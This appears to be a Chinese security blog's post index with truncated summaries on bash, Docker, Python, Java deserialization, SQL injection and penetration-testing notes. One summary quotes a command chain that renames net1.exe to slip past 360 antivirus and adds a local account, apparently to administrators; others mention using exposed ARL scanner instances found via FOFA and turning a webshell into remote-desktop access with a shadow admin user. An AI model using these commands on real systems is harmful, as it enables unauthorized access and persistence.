bash 传参
摘要:
#!/bin/bash while getopts "ab:c" opt; do #字母后的冒号表示该选项存在参数 case "$opt" in a) echo "选项 -a" ;; b) echo "选项 -b,参数:$OPTARG" ;; c) echo "选项 -c" ;; \?) echo
[docker教程]docker基础速成
摘要:
docker 基本操作 1.下载/卸载镜像[1] 拉取最新版本的 Nginx 镜像: Bash docker pull nginx 拉取 1.19 版本的 Nginx 镜像: Bash docker pull nginx:1.19 拉取某个特定摘要的 Nginx 镜像(通常用于确保拉取到完全一致的镜
[JAVA反序列化学习]从零到URLDNS链
摘要:
"Talk is cheap. Show me the code." Linus Torvalds JAVA反序列化 基础请见:JAVA序列化随笔 通过重写readObject方法实现RCE(最基本的原理) 漏洞点(假设传入的ser可控): ***impar.java*** package Seri
bash shell多线程方案
摘要:
一般多线程 #!/bin/bash function task { echo "Starting task $1" sleep $1 echo "Task $1 completed" } # 启动多个后台任务 task 1 & task 2 & task 3 & # 等待所有后台任务完成 wait
蟒蛇的零碎记录
摘要:
列表与集合 print(type(set())) # <class 'set'> print(type({})) # <class 'dict'> print(type({'qpple','pen'})) # <class'set'> colorama,显示多姿多彩字符串到终端 strip方法,将字
[内网渗透]关于如何绕过360使用net命令添加账户
摘要:
转自https://www.cnblogs.com/Yang34/p/14488100.html copy c:\windows\system32\net1.exe aaa.txt&& aaa.txt user y11 Aa123456@@@ /add&& aaa.txt localgroup ad
杂乱无章的sql注入学习笔记(应该会持续更新)
摘要:
关于注入点: 注入点不仅仅有.php?id=xxx 只要是后端有交互的点都可能存在sql注入,黑盒情况下不知道后端,所以得fuzz,有的数据库会对你的cookie ua进行查询操作,甚至是别的请求头,所以要都fuzz试试.甚至对图片的查询操作都可能存在注入点,思路要打开. 学习sql语句: 参考SQ
在任何系统下使用公网ARL灯塔(免搭建)
摘要:
你是否还因没vps上的ARL灯塔而烦恼? 那就试试这个脚本 fofa: title='资产灯塔系统' ''' 抓ARL灯塔 ''' import requests from requests.packages.urllib3.exceptions import InsecureRequestWarn
随笔记录:linux正则小技巧col -b
摘要:
当我们的文件中有很多多姿多彩的字符串或类似^M这样的退格符时,正则匹配变得困难. 此时只需加一个管道命令col -b 就可以去除退格符进行匹配 比如: cat reports.txt | col -b |grep -o 'http.*' > newreports.txt (将afrog的结果重定向到
webshell转远程桌面
摘要:
就在刚刚我成功的通过webshell跳到了远程桌面 下面记录一下拿下的过程 参考以下链接即可 添加用户(「渗透技巧」添加 administrator 影子用户-CSDN博客)[https://blog.csdn.net/Javachichi/article/details/129280873] 开启
